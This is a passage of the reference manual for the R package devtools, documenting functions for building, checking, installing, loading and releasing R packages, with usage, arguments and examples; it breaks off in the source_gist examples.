- reload .................................................... 25
- revdep .................................................... 25
- run_examples .......................................... 27
- save_all ............................................... 28
- show_news .............................................. 28
- source_gist ........................................... 29
- source_url ............................................. 30
- spell_check ............................................ 31
- test ....................................................... 31
- uninstall .............................................. 32
- wd .......................................................... 33
Index 34
bash Open bash shell in package directory.
Description
Open bash shell in package directory.
Usage
bash(pkg = ".")
Arguments
pkg
The package to use, can be a file path to the package or a package object. See
`as.package()` for more information.
build Build package
Description
Building converts a package source directory into a single bundled file. If `binary = FALSE` this creates a tar.gz package that can be installed on any platform, provided they have a full development environment (although packages without source code can typically be installed out of the box). If `binary = TRUE`, the package will have a platform specific extension (e.g. .zip for windows), and will only be installable on the current platform, but no development environment is needed.
Usage
```r
build(
pkg = ".",
path = NULL,
binary = FALSE,
vignettes = TRUE,
manual = FALSE,
args = NULL,
quiet = FALSE,
...
)
```
Arguments
pkg
The package to use, can be a file path to the package or a package object. See
`as.package()` for more information.
path
Path in which to produce package. If `NULL`, defaults to the parent directory of
the package.
binary
Produce a binary (`--binary`) or source (`--no-manual --no-resave-data`) version of the package.
vignettes
For source packages: if `FALSE`, don’t build PDF vignettes (`--no-build-vignettes`).
manual
For source packages: if `FALSE`, don’t build the PDF manual (`--no-manual`).
args
An optional character vector of additional command line arguments to be passed
to R CMD build if `binary = FALSE`, or R CMD install if `binary = TRUE`.
quiet if TRUE suppresses output from this function.
...
Additional arguments passed to pkgbuild::build.
Value
a string giving the location (including file name) of the built package
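Examples

An illustrative sketch (not run; assumes the working directory is a package source tree):

```r
## Not run:
build()               # source .tar.gz in the parent directory
build(binary = TRUE)  # platform-specific binary package instead
## End(Not run)
```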
build_manual Create package pdf manual
Description
Create package pdf manual
Usage
build_manual(pkg = ".", path = NULL)
Arguments
pkg The package to use, can be a file path to the package or a package object. See as.package() for more information.
path path in which to produce package manual. If NULL, defaults to the parent directory of the package.
See Also
Rd2pdf()
build_readme Build a Rmarkdown README for a package
Description
build_readme() is a wrapper around rmarkdown::render(); it generates the README.md from a README.Rmd file.
Usage
build_readme(path = ".", quiet = TRUE, ...)
Arguments
path path to the package to build the readme.
quiet If TRUE, suppress output.
... additional arguments passed to rmarkdown::render()
**build_site**
Execute **pkgdown** build site in a package
**Description**
`build_site()` is a shortcut for `pkgdown::build_site()`; it generates the static HTML documentation.
**Usage**
```r
build_site(path = ".", quiet = TRUE, ...)
```
**Arguments**
- **path**
- path to the package to build the static HTML.
- **quiet**
- If TRUE, suppress output.
- **...**
- additional arguments passed to `pkgdown::build_site()`
**build_vignettes**
Build package vignettes.
**Description**
Builds package vignettes using the same algorithm that R CMD build does. This means including non-Sweave vignettes, using makefiles (if present), and copying over extra files. The files are copied into the 'doc' directory and a vignette index is created in 'Meta/vignette.rds', as they would be in a built package. 'doc' and 'Meta' are added to .Rbuildignore, so they will not be included in the built package. These files can be checked into version control, so they can be viewed with `browseVignettes()` and `vignette()` if the package has been loaded with `load_all()` without needing to re-build them locally.
**Usage**
```r
build_vignettes(
pkg = ".",
dependencies = "VignetteBuilder",
clean = TRUE,
upgrade = "never",
quiet = TRUE,
install = TRUE,
keep_md = TRUE
)
```
Arguments
pkg
The package to use, can be a file path to the package or a package object. See `as.package()` for more information.
dependencies
Which dependencies do you want to check? Can be a character vector (selecting from "Depends", "Imports", "LinkingTo", "Suggests", or "Enhances"), or a logical vector. TRUE is shorthand for "Depends", "Imports", "LinkingTo" and "Suggests". NA is shorthand for "Depends", "Imports" and "LinkingTo" and is the default. FALSE is shorthand for no dependencies (i.e. just check this package, not its dependencies).
clean
Remove all files generated by the build, even if there were copies there before.
upgrade
One of "default", "ask", "always", or "never". "default" respects the value of the R_REMOTES_UPGRADE environment variable if set, and falls back to "ask" if unset. "ask" prompts the user for which out of date packages to upgrade. For non-interactive sessions "ask" is equivalent to "always". TRUE and FALSE are also accepted and correspond to "always" and "never" respectively.
quiet
If TRUE, suppresses most output. Set to FALSE if you need to debug.
install
If TRUE, install the package before building vignettes.
keep_md
If TRUE, move md intermediates as well as rendered outputs. Most useful when using the keep_md YAML option for Rmarkdown outputs. See https://bookdown.org/yihui/rmarkdown/html-document.html#keeping-markdown.
See Also
clean_vignettes() to remove the pdfs in ‘doc’ created from vignettes
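Examples

An illustrative sketch (not run; assumes the current directory is a package with vignettes):

```r
## Not run:
build_vignettes()                 # build vignettes into 'doc'
build_vignettes(install = FALSE)  # skip reinstalling the package first
## End(Not run)
```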
check Build and check a package, cleaning up automatically on success.
Description
check automatically builds and checks a source package, using all known best practices. check_built checks an already built package.
Usage
check(
pkg = ".",
document = NA,
build_args = NULL,
...,
manual = FALSE,
cran = TRUE,
remote = FALSE,
incoming = remote,
force_suggests = FALSE,
run_dont_test = FALSE,
args = "--timings",
env_vars = c(NOT_CRAN = "true"),
quiet = FALSE,
check_dir = tempdir(),
cleanup = TRUE,
vignettes = TRUE,
error_on = c("never", "error", "warning", "note")
)
check_built(
path = NULL,
cran = TRUE,
remote = FALSE,
incoming = remote,
force_suggests = FALSE,
run_dont_test = FALSE,
manual = FALSE,
args = "--timings",
env_vars = NULL,
check_dir = tempdir(),
quiet = FALSE,
error_on = c("never", "error", "warning", "note")
)
Arguments
pkg
The package to use, can be a file path to the package or a package object. See
as.package() for more information.
document
If NA and the package uses roxygen2, will rerun document() prior to checking. Use TRUE and FALSE to override this default.
build_args
Additional arguments passed to R CMD build
... Additional arguments passed on to pkgbuild::build().
manual
If FALSE, don’t build and check manual (--no-manual).
cran
if TRUE (the default), check using the same settings as CRAN uses.
remote
Sets _R_CHECK_CRAN_INCOMING_REMOTE_ env var. If TRUE, performs a number of CRAN incoming checks that require remote access.
incoming
Sets _R_CHECK_CRAN_INCOMING_ env var. If TRUE, performs a number of CRAN incoming checks.
force_suggests
Sets _R_CHECK_FORCE_SUGGESTS_. If FALSE (the default), check will proceed even if all suggested packages aren’t found.
run_dont_test
Sets --run-donttest so that tests surrounded in \donttest{} are also tested. This is important for CRAN submission.
args Additional arguments passed to R CMD check
env_vars Environment variables set during R CMD check
quiet if TRUE suppresses output from this function.
check_dir The directory in which the package is checked; defaults to a temporary directory. args = "--output=/foo/bar"
can be used to change the check directory.
cleanup Deprecated.
vignettes If FALSE, do not build or check vignettes, equivalent to using args = '--ignore-vignettes' and build_args = '--no-build-vignettes'.
error_on Whether to throw an error on R CMD check failures. Note that the check is always completed (unless a timeout happens), and the error is only thrown after completion. If "never", then no errors are thrown. If "error", then only ERROR failures generate errors. If "warning", then WARNING failures generate errors as well. If "note", then any check failure generates an error.
path Path to built package.
Details
Passing R CMD check is essential if you want to submit your package to CRAN: you must not have any ERRORs or WARNINGs, and you want to ensure that there are as few NOTEs as possible. If you are not submitting to CRAN, at least ensure that there are no ERRORs or WARNINGs: these typically represent serious problems.
check automatically builds a package before calling check_built as this is the recommended way to check packages. Note that this process runs in an independent realisation of R, so nothing in your current workspace will affect the process.
Value
An object containing errors, warnings, and notes.
Environment variables
Devtools does its best to set up an environment that combines best practices with how check works on CRAN. This includes:
- The standard environment variables set by devtools: r_env_vars(). Of particular note for package tests is the NOT_CRAN env var which lets you know that your tests are not running on CRAN, and hence can take a reasonable amount of time.
- Debugging flags for the compiler, set by compiler_flags(FALSE).
- If aspell is found _R_CHECK_CRAN_INCOMING_USE_ASPELL_ is set to TRUE. If no spell checker is installed, a warning is issued.
- env vars set by arguments incoming, remote and force_suggests
See Also
release() if you want to send the checked package to CRAN.
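Examples

An illustrative sketch (not run; assumes the working directory is a package source tree):

```r
## Not run:
res <- check()               # build and check the current package
check(error_on = "warning")  # fail on WARNINGs as well as ERRORs
## End(Not run)
```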
check_failures
Parses R CMD check log file for ERRORs, WARNINGs and NOTEs
Description
Extracts check messages from the 00check.log file generated by R CMD check.
Usage
check_failures(path, error = TRUE, warning = TRUE, note = TRUE)
Arguments
path
check path, e.g., value of the check_dir argument in a call to check()
error, warning, note
logical, indicates if errors, warnings and/or notes should be returned
Value
a character vector with the relevant messages, can have length zero if no messages are found
See Also
check()
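Examples

An illustrative sketch (not run; "my_check_dir" is a hypothetical directory name):

```r
## Not run:
check(check_dir = "my_check_dir")
check_failures("my_check_dir", note = FALSE)  # only ERRORs and WARNINGs
## End(Not run)
```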
check_man
Check documentation, as R CMD check does.
Description
This function attempts to run the documentation related checks in the same way that R CMD check does. Unfortunately it can’t run them all because some tests require the package to be loaded, and the way they attempt to load the code conflicts with how devtools does it.
Usage
check_man(pkg = ".")
Arguments
pkg
The package to use, can be a file path to the package or a package object. See as.package() for more information.
Value
Nothing. This function is called purely for its side effects.
Examples
```r
## Not run:
check_man("mypkg")
## End(Not run)
```
---
**check_rhub**
*Run CRAN checks for package on R-hub*
**Description**
It runs `build()` on the package, with the arguments specified in `args`, and then submits it to the R-hub builder at https://builder.r-hub.io. The interactive option controls whether the function waits for the check output. Regardless, after the check is complete, R-hub sends an email with the results to the package maintainer.
**Usage**
```r
check_rhub(
pkg = ".",
platforms = NULL,
email = NULL,
interactive = TRUE,
build_args = NULL,
...
)
```
**Arguments**
- `pkg` The package to use, can be a file path to the package or a package object. See `as.package()` for more information.
- `platforms` R-hub platforms to run the check on. If `NULL` uses default list of CRAN checkers (one for each major platform, and one with extra checks if you have compiled code). You can also specify your own, see `rhub::platforms()` for a complete list.
- `email` email address to notify, defaults to the maintainer address in the package.
- `interactive` whether to show the status of the build interactively. R-hub will send an email to the package maintainer’s email address, regardless of whether the check is interactive or not.
- `build_args` Arguments passed to R CMD build
- `...` extra arguments, passed to `rhub::check_for_cran()`.
**Value**
A `rhub_check` object.
About email validation on r-hub
To build and check R packages on R-hub, you need to validate your email address. This is because R-hub sends out emails about build results. See more at rhub::validate_email().
See Also
Other build functions: check_win()
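Examples

An illustrative sketch (not run; requires a validated email address with R-hub, and the platform name shown is only an example — see `rhub::platforms()` for the current list):

```r
## Not run:
check_rhub()  # default CRAN-like platforms
check_rhub(platforms = "debian-gcc-devel", interactive = FALSE)
## End(Not run)
```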
check_win Build windows binary package.
Description
This function works by building a source package, and then uploading it to https://win-builder.r-project.org/. Once building is complete you’ll receive a link to the built package at the email address listed in the maintainer field. It usually takes around 30 minutes. As a side effect, win-builder also runs R CMD check on the package, so check_win is also useful to check that your package is OK on Windows.
Usage
check_win_devel(
pkg = ".",
args = NULL,
manual = TRUE,
email = NULL,
quiet = FALSE,
...
)
check_win_release(
pkg = ".",
args = NULL,
manual = TRUE,
email = NULL,
quiet = FALSE,
...
)
check_win_oldrelease(
pkg = ".",
args = NULL,
manual = TRUE,
email = NULL,
quiet = FALSE,
...
)
Arguments
pkg The package to use, can be a file path to the package or a package object. See `as.package()` for more information.
args An optional character vector of additional command line arguments to be passed to R CMD build if `binary = FALSE`, or R CMD install if `binary = TRUE`.
manual For source packages: if `FALSE`, don't build the PDF manual (`--no-manual`).
email An alternative email to use, default `NULL` uses the package Maintainer's email.
quiet If `TRUE`, suppresses output.
... Additional arguments passed to `pkgbuild::build()`.
Functions
- `check_win_devel`: Check package on the development version of R.
- `check_win_release`: Check package on the release version of R.
- `check_win_oldrelease`: Check package on the previous major release version of R.
See Also
Other build functions: `check_rhub()`
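Examples

An illustrative sketch (not run; results are emailed to the package maintainer):

```r
## Not run:
check_win_devel()    # check on the development version of R
check_win_release()  # check on the released version of R
## End(Not run)
```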
clean_vignettes Clean built vignettes.
Description
This uses a fairly rudimentary algorithm where any files in 'doc' with a name that exists in 'vignettes' are removed.
Usage
clean_vignettes(pkg = ".")
Arguments
pkg The package to use, can be a file path to the package or a package object. See `as.package()` for more information.
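Examples

An illustrative sketch (not run; removes built files from 'doc' that mirror files in 'vignettes'):

```r
## Not run:
clean_vignettes()
## End(Not run)
```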
create
Create a package
Description
Create a package
Usage
```r
create(
path,
fields = NULL,
rstudio = rstudioapi::isAvailable(),
open = interactive()
)
```
Arguments
- **path**
A path. If it exists, it is used. If it does not exist, it is created, provided that the parent path exists.
- **fields**
A named list of fields to add to DESCRIPTION, potentially overriding default values. See `use_description()` for how you can set personalized defaults using package options.
- **rstudio**
If TRUE, calls `use_rstudio()` to make the new package or project into an RStudio Project.
- **open**
If TRUE, activates the new project:
- If RStudio desktop, the package is opened in a new session.
- If on RStudio server, the current RStudio project is activated.
- Otherwise, the working directory and active project are changed.
Value
The path to the created package, invisibly.
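Examples

An illustrative sketch (not run; "mypkg" and the License field value are only examples):

```r
## Not run:
create("../mypkg")
create("../mypkg", fields = list(License = "MIT + file LICENSE"))
## End(Not run)
```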
devtools
Package development tools for R.
Description
Collection of package development tools.
Package options
Devtools uses the following `options()` to configure behaviour:
- `devtools.path`: path to use for `dev_mode()`
- `devtools.name`: your name, used when signing draft emails.
- `devtools.install.args`: a string giving extra arguments passed to R CMD install by `install()`.
- `devtools.desc.author`: a string providing a default Authors@R string to be used in new `DESCRIPTION`'s. Should be R code, and look like "Hadley Wickham <h.wickham@gmail.com> [aut,cre]". See `utils::as.person()` for more details.
- `devtools.desc.license`: a default license string to use for new packages.
- `devtools.desc.suggests`: a character vector listing packages to add to suggests by default for new packages.
- `devtools.desc`: a named list listing any other extra options to add to `DESCRIPTION`
Author(s)
**Maintainer**: Jim Hester <jim.hester@rstudio.com>
Authors:
- Hadley Wickham
- Winston Chang
Other contributors:
- RStudio [copyright holder]
- R Core team (Some namespace and vignette code extracted from base R) [contributor]
See Also
Useful links:
- [https://devtools.r-lib.org/](https://devtools.r-lib.org/)
- [https://github.com/r-lib/devtools](https://github.com/r-lib/devtools)
- Report bugs at [https://github.com/r-lib/devtools/issues](https://github.com/r-lib/devtools/issues)
**dev_mode**
*Activate and deactivate development mode.*
**Description**
When activated, dev_mode creates a new library for storing installed packages. This new library is automatically created when dev_mode is activated if it does not already exist. This allows you to test development packages in a sandbox, without interfering with the other packages you have installed.
**Usage**
```r
dev_mode(on = NULL, path = getOption("devtools.path"))
```
**Arguments**
- **on**
- turn dev mode on (TRUE) or off (FALSE). If omitted will guess based on whether or not path is in `.libPaths()`.
- **path**
- directory to library.
**Examples**
```r
## Not run:
dev_mode()  # turn dev mode on
dev_mode()  # calling again (with path in .libPaths()) turns it off
## End(Not run)
```
**dev_sitrep**
*Report package development situation*
**Description**
dev_sitrep() reports
- If R is up to date
- If RStudio is up to date
- If compiler build tools are installed and available for use
- If devtools and its dependencies are up to date
- If the package’s dependencies are up to date
Call this function if things seem weird and you’re not sure what’s wrong or how to fix it. If this function returns no output everything should be ready for package development.
Usage
dev_sitrep(pkg = ".", debug = FALSE)
Arguments
pkg
The package to use, can be a file path to the package or a package object. See as.package() for more information.
debug
If TRUE, will print out extra information useful for debugging. If FALSE, it will use result cached from a previous run.
Value
A named list, with S3 class dev_sitrep (for printing purposes).
Examples
```r
## Not run:
dev_sitrep()
## End(Not run)
```
document
Use roxygen to document a package.
Description
This function is a wrapper for the roxygen2::roxygenize() function from the roxygen2 package. See the documentation and vignettes of that package to learn how to use roxygen.
Usage
document(pkg = ".", roclets = NULL, quiet = FALSE)
Arguments
pkg
The package to use, can be a file path to the package or a package object. See as.package() for more information.
roclets
Character vector of roclet names to use with package. The default, NULL, uses the roxygen roclets option, which defaults to c("collate","namespace","rd").
quiet
if TRUE suppresses output from this function.
See Also
roxygen2::roxygenize(), browseVignettes("roxygen2")
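Examples

An illustrative sketch (not run; assumes the working directory is a package using roxygen2 comments):

```r
## Not run:
document()  # regenerate man/ pages and NAMESPACE
document(roclets = c("collate", "namespace", "rd"))
## End(Not run)
```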
install
Install a local development package.
Description
Uses R CMD INSTALL to install the package. Will also try to install dependencies of the package from CRAN, if they're not already installed.
Usage
install(
pkg = ".",
reload = TRUE,
quick = FALSE,
build = !quick,
args = getOption("devtools.install.args"),
quiet = FALSE,
dependencies = NA,
upgrade = "ask",
build_vignettes = FALSE,
keep_source = getOption("keep.source.pkgs"),
force = FALSE,
...
)
Arguments
pkg The package to use, can be a file path to the package or a package object. See as.package() for more information.
reload if TRUE (the default), will automatically reload the package after installing.
quick if TRUE skips docs, multiple-architectures, demos, and vignettes, to make installation as fast as possible.
build if TRUE pkgbuild::build()s the package first: this ensures that the installation is completely clean, and prevents any binary artefacts (like `.o`, `.so`) from appearing in your local package directory, but is considerably slower, because every compile has to start from scratch.
args An optional character vector of additional command line arguments to be passed to R CMD INSTALL. This defaults to the value of the option "devtools.install.args".
quiet If TRUE, suppress output.
dependencies Which dependencies do you want to check? Can be a character vector (selecting from "Depends", "Imports", "LinkingTo", "Suggests", or "Enhances"), or a logical vector. TRUE is shorthand for "Depends", "Imports", "LinkingTo" and "Suggests". NA is shorthand for "Depends", "Imports" and "LinkingTo" and is the default. FALSE is shorthand for no dependencies (i.e. just check this package, not its dependencies).
upgrade
One of "default", "ask", "always", or "never". "default" respects the value of the R_REMOTES_UPGRADE environment variable if set, and falls back to "ask" if unset. "ask" prompts the user for which out of date packages to upgrade. For non-interactive sessions "ask" is equivalent to "always". TRUE and FALSE are also accepted and correspond to "always" and "never" respectively.
build_vignettes
if TRUE, will build vignettes. Normally it is build that’s responsible for creating vignettes; this argument makes sure vignettes are built even if a build never happens (i.e. because build = FALSE).
keep_source
If TRUE will keep the srcrefs from an installed package. This is useful for debugging (especially inside of RStudio). It defaults to the option "keep.source.pkgs".
force
Force installation, even if the remote state has not changed since the previous install.
... additional arguments passed to remotes::install_deps() when installing dependencies.
Details
If quick = TRUE, installation takes place using the current package directory. If you have compiled code, this means that artefacts of compilation will be created in the src/ directory. If you want to avoid this, you can use build = TRUE to first build a package bundle and then install it from a temporary directory. This is slower, but keeps the source directory pristine.
If the package is loaded, it will be reloaded after installation. This is not always completely possible, see reload() for caveats.
To install a package in a non-default library, use withr::with_libpaths().
See Also
update_packages() to update installed packages from the source location and with_debug() to install packages with debugging flags set.
Other package installation: uninstall()
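Examples

An illustrative sketch (not run; assumes the working directory is a package source tree):

```r
## Not run:
install()              # build, then install the package in "."
install(quick = TRUE)  # skip docs and vignettes for a faster cycle
## End(Not run)
```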
install_deps
Install package dependencies if needed.
Description
install_deps() will install the user dependencies needed to run the package, install_dev_deps() will also install the development dependencies needed to test and build the package.
Usage
install_deps(
pkg = ".",
dependencies = NA,
repos = getOption("repos"),
type = getOption("pkgType"),
upgrade = c("default", "ask", "always", "never"),
quiet = FALSE,
build = TRUE,
build_opts = c("--no-resave-data", "--no-manual", "--no-build-vignettes"),
...
)
install_dev_deps(
pkg = ".",
dependencies = TRUE,
repos = getOption("repos"),
type = getOption("pkgType"),
upgrade = c("default", "ask", "always", "never"),
quiet = FALSE,
build = TRUE,
build_opts = c("--no-resave-data", "--no-manual", "--no-build-vignettes"),
...
)
Arguments
pkg The package to use, can be a file path to the package or a package object. See as.package() for more information.
dependencies Which dependencies do you want to check? Can be a character vector (selecting from "Depends", "Imports", "LinkingTo", "Suggests", or "Enhances"), or a logical vector.
TRUE is shorthand for "Depends", "Imports", "LinkingTo" and "Suggests". NA is shorthand for "Depends", "Imports" and "LinkingTo" and is the default. FALSE is shorthand for no dependencies (i.e. just check this package, not its dependencies).
repos A character vector giving repositories to use.
type Type of package to update.
upgrade One of "default", "ask", "always", or "never". "default" respects the value of the R_REMOTES_UPGRADE environment variable if set, and falls back to "ask" if unset. "ask" prompts the user for which out of date packages to upgrade. For non-interactive sessions "ask" is equivalent to "always". TRUE and FALSE are also accepted and correspond to "always" and "never" respectively.
quiet If TRUE, suppress output.
build if TRUE pkgbuild::build()s the package first: this ensures that the installation is completely clean, and prevents any binary artefacts (like ".o", ".so") from
appearing in your local package directory, but is considerably slower, because every compile has to start from scratch.
**build_opts** Options to pass to R CMD build, only used when `build = TRUE`.
... additional arguments passed to `remotes::install_deps()` when installing dependencies.
**Examples**
```r
## Not run: install_deps(".")
```
---
**lint**
*Lint all source files in a package.*
**Description**
The default linters correspond to the style guide at [http://r-pkgs.had.co.nz/r.html#style](http://r-pkgs.had.co.nz/r.html#style), however it is possible to override any or all of them using the `linters` parameter.
**Usage**
```r
lint(pkg = ".", cache = TRUE, ...)
```
**Arguments**
- **pkg** The package to use, can be a file path to the package or a package object. See `as.package()` for more information.
- **cache** store the lint results so repeated lints of the same content use the previous results.
- **...** additional arguments passed to `lintr::lint_package()`
**Details**
The lintr cache is by default stored in `~/.R/lintr_cache/` (this can be configured by setting `options(lintr.cache_directory)`). It can be cleared by calling `lintr::clear_cache()`.
**See Also**
- `lintr::lint_package()`, `lintr::lint()`
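**Examples**

An illustrative sketch (not run; assumes the working directory is a package source tree):

```r
## Not run:
lint()               # lint the package in the current directory
lint(cache = FALSE)  # ignore previously cached results
## End(Not run)
```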
load_all Load complete package
Description
load_all loads a package. It roughly simulates what happens when a package is installed and loaded with library().
Usage
load_all(
path = ".",
reset = TRUE,
recompile = FALSE,
export_all = TRUE,
helpers = TRUE,
quiet = FALSE,
...
)
Arguments
path Path to a package, or within a package.
reset clear package environment and reset file cache before loading any pieces of the package. This is equivalent to running unload() and is the default. Using reset = FALSE may be faster for large code bases, but is a significantly less accurate approximation.
recompile DEPRECATED. Force a recompile of the DLL from source code, if present. This is equivalent to running pkgbuild::clean_dll() before load_all.
export_all If TRUE (the default), export all objects. If FALSE, export only the objects that are listed as exports in the NAMESPACE file.
helpers if TRUE loads testthat test helpers.
quiet if TRUE suppresses output from this function.
... Additional arguments passed to pkgload::load_all().
Details
Currently load_all:
- Loads all data files in data/. See load_data() for more details.
- Sources all R files in the R directory, storing results in environment that behaves like a regular package namespace. See below and load_code() for more details.
- Compiles any C, C++, or Fortran code in the src/ directory and connects the generated DLL into R. See compile_dll() for more details.
- Runs .onAttach(), .onLoad() and .onUnload() functions at the correct times.
If you use `testthat`, `load_all` will load all test helpers so you can access them interactively. `devtools` sets the `DEVTOOLS_LOAD` environment variable to "true" to let you check whether the helpers are run during package loading.
Namespaces
The namespace environment `<namespace:pkgname>` is a child of the imports environment, which has the name attribute `imports:pkgname`. It in turn is a child of `<namespace:base>`, which is a child of the global environment. (There is also a copy of the base namespace that is a child of the empty environment.)
The package environment `<package:pkgname>` is an ancestor of the global environment. Normally when loading a package, the objects listed as exports in the `NAMESPACE` file are copied from the namespace to the package environment. However, `load_all` by default will copy all objects (not just the ones listed as exports) to the package environment. This is useful during development because it makes all objects easy to access.
To export only the objects listed as exports, use `export_all=FALSE`. This more closely simulates behavior when loading an installed package with `library()`, and can be useful for checking for missing exports.
Shim files
`load_all` also inserts shim functions into the imports environment of the loaded package. It presently adds a replacement version of `system.file` which returns different paths from `base::system.file`. This is needed because installed and uninstalled package sources have different directory structures. Note that this is not a perfect replacement for `base::system.file`.
Examples
```r
## Not run:
# Load the package in the current directory
load_all("./")
# Running again loads changed files
load_all("./")
# With reset=TRUE, unload and reload the package for a clean start
load_all("./", TRUE)
# With export_all=FALSE, only objects listed as exports in NAMESPACE are exported
load_all("./", export_all = FALSE)
## End(Not run)
```
missing_s3
Find missing s3 exports.
Description
The method is heuristic - looking for objects with a period in their name.
Usage
missing_s3(pkg = ".")
Arguments
pkg The package to use, can be a file path to the package or a package object. See as.package() for more information.
package_file
Find file in a package.
Description
It always starts by walking up the path until it finds the root directory, i.e. a directory containing DESCRIPTION. If it cannot find the root directory, or it can’t find the specified path, it will throw an error.
Usage
package_file(..., path = ".")
Arguments
... Components of the path.
path Place to start search for package directory.
Examples
## Not run:
package_file("figures", "figure_1")
## End(Not run)
release
Release package to CRAN.
Description
Run automated and manual tests, then post package to CRAN.
Usage
release(pkg = ".", check = FALSE, args = NULL)
Arguments
pkg
The package to use, can be a file path to the package or a package object. See as.package() for more information.
check
if TRUE, run checking, otherwise omit it. This is useful if you’ve just checked your package and you’re ready to release it.
args
An optional character vector of additional command line arguments to be passed to R CMD build.
Details
The package release process will:
- Confirm that the package passes R CMD check on relevant platforms
- Confirm that important files are up-to-date
- Build the package
- Submit the package to CRAN, using comments in "cran-comments.md"
You can add arbitrary extra questions by defining an (un-exported) function called release_questions() that returns a character vector of additional questions to ask.
You also need to read the CRAN repository policy at https://cran.r-project.org/web/packages/policies.html and make sure you’re in line with the policies. release tries to automate as many of the policies as possible, but it’s impossible to be completely comprehensive, and they do change between releases of devtools.
See Also
usethis::use_release_issue() to create a checklist of release tasks that you can use in addition to or in place of release.
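Examples

An illustrative sketch of the release_questions() mechanism described above (not run; the questions shown are only examples):

```r
## Not run:
# In your package's R/ code (not exported):
release_questions <- function() {
  c(
    "Have you regenerated the website?",
    "Have you updated the benchmarks?"
  )
}
# release() will then ask these in addition to its standard questions
release()
## End(Not run)
```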
**reload**
*Unload and reload package.*
**Description**
This attempts to unload and reload an *installed* package. If the package is not loaded already, it does nothing. It’s not always possible to cleanly unload a package: see the caveats in `unload()` for some of the potential failure points. If in doubt, restart R and reload the package with `library()`.
**Usage**
```r
reload(pkg = ".", quiet = FALSE)
```
**Arguments**
- `pkg` The package to use, can be a file path to the package or a package object. See `as.package()` for more information.
- `quiet` if TRUE suppresses output from this function.
**See Also**
- `load_all()` to load a package for interactive development.
**Examples**
```r
## Not run:
# Reload package that is in current directory
reload(".")
# Reload package that is in ./ggplot2/
reload("ggplot2/")
# Can use inst() to find the package path
# This will reload the installed ggplot2 package
reload(pkgload::inst("ggplot2"))
## End(Not run)
```
---
**revdep**
*Reverse dependency tools.*
**Description**
Tools to check and notify maintainers of all CRAN and Bioconductor packages that depend on the specified package.
Usage
```r
revdep(
pkg,
dependencies = c("Depends", "Imports", "Suggests", "LinkingTo"),
recursive = FALSE,
ignore = NULL,
bioconductor = FALSE
)
revdep_maintainers(pkg = ".")
```
Arguments
- **pkg**: Package name. This is unlike most devtools functions, which take a path, because you might want to determine dependencies for a package that you don’t have installed. If omitted, defaults to the name of the current package.
- **dependencies**: A character vector listing the types of dependencies to follow.
- **recursive**: If TRUE look for full set of recursive dependencies.
- **ignore**: A character vector of package names to ignore. These packages will not appear in the returned vector.
- **bioconductor**: If TRUE also look for dependencies amongst Bioconductor packages.
Details
The first run in a session will be time-consuming because it must download all package metadata from CRAN and Bioconductor. Subsequent runs will be faster.
See Also
The `revdepcheck` package can be used to run R CMD check on all reverse dependencies.
Examples
```r
## Not run:
revdep("ggplot2")
revdep("ggplot2", ignore = c("xkcd", "zoo"))
## End(Not run)
```
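Conceptually, `revdep()` walks the reversed dependency graph: the direct reverse dependencies are the packages that list `pkg` among their own dependencies, and `recursive = TRUE` closes that relation transitively. A minimal Python sketch of the idea (toy in-memory graph; the function and data shapes are illustrative, not the devtools implementation):

```python
def revdep(pkg, deps, recursive=False, ignore=()):
    """Names of packages that depend on `pkg`.

    `deps` maps each package to the list of packages it depends on
    (a toy stand-in for CRAN metadata). With recursive=True the
    search follows reverse dependencies transitively.
    """
    # Invert the dependency edges once: dependency -> dependents.
    rdeps = {}
    for p, ds in deps.items():
        for d in ds:
            rdeps.setdefault(d, set()).add(p)
    result, frontier = set(), {pkg}
    while frontier:
        found = set()
        for d in frontier:
            found |= rdeps.get(d, set()) - result
        result |= found
        frontier = found if recursive else set()  # one level unless recursive
    return sorted(result - set(ignore))

deps = {"xkcd": ["ggplot2"], "cowplot": ["ggplot2"], "ggExtra": ["cowplot"]}
assert revdep("ggplot2", deps) == ["cowplot", "xkcd"]
assert revdep("ggplot2", deps, recursive=True) == ["cowplot", "ggExtra", "xkcd"]
assert revdep("ggplot2", deps, ignore=["xkcd"]) == ["cowplot"]
```

The real function additionally downloads package metadata from CRAN and Bioconductor on first use, which is why the first run in a session is slow.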
run_examples
Run all examples in a package.
Description
One of the most frustrating parts of R CMD check is getting all of your examples to pass - whenever one fails you need to fix the problem and then restart the whole process. This function makes it a little easier by making it possible to run all examples from an R function.
Usage
```r
run_examples(
pkg = ".",
start = NULL,
show = TRUE,
test = FALSE,
run = TRUE,
fresh = FALSE,
document = TRUE
)
```
Arguments
- `pkg` The package to use, can be a file path to the package or a package object. See `as.package()` for more information.
- `start` Where to start running the examples: this can either be the name of Rd file to start with (with or without extensions), or a topic name. If omitted, will start with the (lexicographically) first file. This is useful if you have a lot of examples and don’t want to rerun them every time you fix a problem.
- `show` DEPRECATED.
- `test` if TRUE, code in `\donttest{}` will be commented out. If FALSE, code in `\testonly{}` will be commented out.
- `run` if TRUE, code in `\dontrun{}` will be commented out.
- `fresh` if TRUE, will be run in a fresh R session. This has the advantage that there’s no way the examples can depend on anything in the current session, but interactive code (like `browser()`) won’t work.
- `document` if TRUE, `document()` will be run to ensure examples are updated before running them.
### save_all
*Save all documents in an active IDE session.*
**Description**
Helper function wrapping IDE-specific calls to save all documents in the active session. In this form, callers of `save_all()` don’t need to execute any IDE-specific code. This function can be extended to include other IDE implementations of their equivalent `rstudioapi::documentSaveAll()` methods.
**Usage**
```r
save_all()
```
### show_news
*Show package news*
**Description**
Show package news
**Usage**
```r
show_news(pkg = ".", latest = TRUE, ...)
```
**Arguments**
- `pkg`
The package to use, can be a file path to the package or a package object. See `as.package()` for more information.
- `latest`
if TRUE, only show the news for the most recent version.
- `...`
other arguments passed on to `news`
source_gist
Run a script on gist
Description
“Gist is a simple way to share snippets and pastes with others. All gists are git repositories, so they are automatically versioned, forkable and usable as a git repository.” [https://gist.github.com/](https://gist.github.com/)
Usage
```
source_gist(id, ..., filename = NULL, sha1 = NULL, quiet = FALSE)
```
Arguments
- **id**: either full url (character), gist ID (numeric or character of numeric).
- **...**: other options passed to `source()`
- **filename**: if there is more than one R file in the gist, which one to source (filename ending in `.R`)? Default NULL will source the first file.
- **sha1**: The SHA-1 hash of the file at the remote URL. This is highly recommended as it prevents you from accidentally running code that’s not what you expect. See `source_url()` for more information on using a SHA-1 hash.
- **quiet**: if FALSE, the default, prints informative messages.
See Also
`source_url()`
Examples
```
## Not run:
# You can run gists given their id
source_gist(6872663)
source_gist("6872663")
# Or their html url
source_gist("https://gist.github.com/hadley/6872663")
source_gist("gist.github.com/hadley/6872663")
# It's highly recommended that you run source_gist with the optional
# sha1 argument - this will throw an error if the file has changed since
# you first ran it
